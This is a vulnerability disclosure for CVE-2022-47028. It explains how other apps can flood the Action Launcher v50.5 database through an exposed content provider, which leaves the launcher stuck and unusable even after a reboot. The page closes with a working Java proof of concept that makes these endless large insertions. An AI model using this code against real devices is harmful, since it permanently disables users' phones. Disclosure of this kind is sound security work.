Headline
CVE-2022-47028: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs
An issue discovered in Action Launcher for Android v50.5 allows an attacker to cause a denial of service via arbitary data injection to function insert.
Denial of Service exists in Action Launcher(CVE-2022-47028)
Vendor: Action Launcher(https://actionlauncher.com/)
Affected product: Action Launcher (com.actionlauncher.playstore)
Version: 50.5
Download link: https://play.google.com/store/apps/details?id=com.actionlauncher.playstore&hl=en
Description of the vulnerability for use in the CVE: Action Launcher v50.5 allows unauthorized apps to inject a large number of data into its database, which will be loaded to memory when the app is opened. The launcher app fails to display the home screens and cannot respond to any user actions , resulting in a permanent Denial of Service (DoS).
Additional information:The app is a launcher app, which can be set by users as phone default launcher. When the launcher app is opened, it sets up home screens by loading saved data from the database to memory. If a malicious app injects a large size of data into the database, the launcher app will get stuck in the initialization phase due to loading a large amount of data in the UI thread. Worse still, users cannot fix the security issue even when rebooting victim devices, since the injected data is persistent in the database. In practice, the launcher app fails to display the home screens and cannot respond to any user actions.
poc:
public void attack_lancher() { ContentResolver contentResolver =getApplicationContext().getContentResolver(); Uri uri = Uri.parse(“content://com.actionlauncher.playstore.settings/favorites”); for (int i = 0; i < Long.MAX_VALUE; i++) { ContentValues contentValues = new ContentValues(); contentValues.put("screen", i); contentValues.put("title", getRandomString(102400)); contentResolver.insert(uri, contentValues); } }